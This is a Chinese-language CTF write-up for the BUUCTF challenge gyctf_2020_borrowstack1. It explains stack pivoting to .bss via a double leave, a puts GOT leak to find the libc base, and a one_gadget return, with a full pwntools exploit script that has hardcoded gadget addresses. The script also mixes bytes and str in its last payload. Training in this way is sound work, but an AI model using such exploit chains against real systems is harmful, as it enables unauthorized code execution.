BUUCTF--gyctf_2020_borrowstack1

这是一题栈迁移的题目，先看看保护：

---

---

黑盒测试：

---

用户可输入两次内容，接着看看IDA中具体程序流程：

---

我们看到溢出内容只有0x10的空间给我们布局，这显然是不足以我们布置rop的。因此肯定就是栈迁移了。迁到什么地方呢，肯定就是这个bank所在的地方了。它在bss段上。我们还需要考虑一些细节上的东西，首先我们需要知道libc的基地址，因此我们需要通过puts函数来泄露。我们先看看最初栈的布局：

此时rip指向leave：

---

栈的内容：

---

leave指令做两件事：mov rsp,rbp；pop rbp.紧接着就是执行ret指令。

因此我们的思路明确了，需要覆盖掉old_rbp（图中手误大家理解就行）和返回地址。

old_rbp覆盖成我们的bss段，让rbp指过去，接着返回地址需要再调用一次leave。

问：(为何栈迁移需要两次调用leave？)

答：第一次调用是控制rbp到达想去的地方，第二次调用是控制rsp达到目的地。此后rbp飞去哪我们就不管了（不明白可以好好理解leave指令干的两件事）

---

因此我们的exp就能这样写了：

from pwn import *

#io=remote('')
io=process('./gyctf_2020_borrowstack')
context.log_level='debug'
elf=ELF('./gyctf_2020_borrowstack')
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")

puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
bank=0x0601080
leave=0x400699
pop_rdi=0x400703  # ROPgadget --binary gyctf_2020_borrowstack  --only 'pop|ret' | grep 'rdi'
main=0x0400626
ret=0x4004c9

gdb.attach(io)
io.recvuntil('u want')
pl1=b'a'*0x60+p64(bank)+p64(leave)    #control rsp -> .bss
io.send(pl1)
# gdb.attach(io)
# pause()
io.recvuntil('now!')
pl2=p64(ret)*20+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)     #leak puts_addr  
io.send(pl2)




io.recvline()

puts_add=u64(io.recv(6).ljust(8,b'\x00'))
print('!!!',hex(puts_add))
libc_base=puts_add-0x6F6A0
one_gadget=libc_base+0x4527a
pl3=b'a'*0x60+'bbbbbbbb'+p64(one_gadget) #one_gadget libc.2.23.so
io.send(pl3)
io.send('a')

io.interactive()

下面我们看下步骤好的栈布局：

---

bss段上的内容：

---

此时劫持完rsp后效果是这样的：

---

接下来的操作基本都是pop，因此rsp是从低地址到高地址跑（每次pop，rsp+8），所以我们顺序布局就可以。

后续的操作就很简单，通过泄露的puts函数地址，计算出libc的基地址，当程序再次回到主函数时，直接将栈上的返回地址覆盖成one_gadget拿到权限。

puts函数偏移和one_gadget偏移要根据自身情况来定。我这是本地的环境。最后打通如下：

---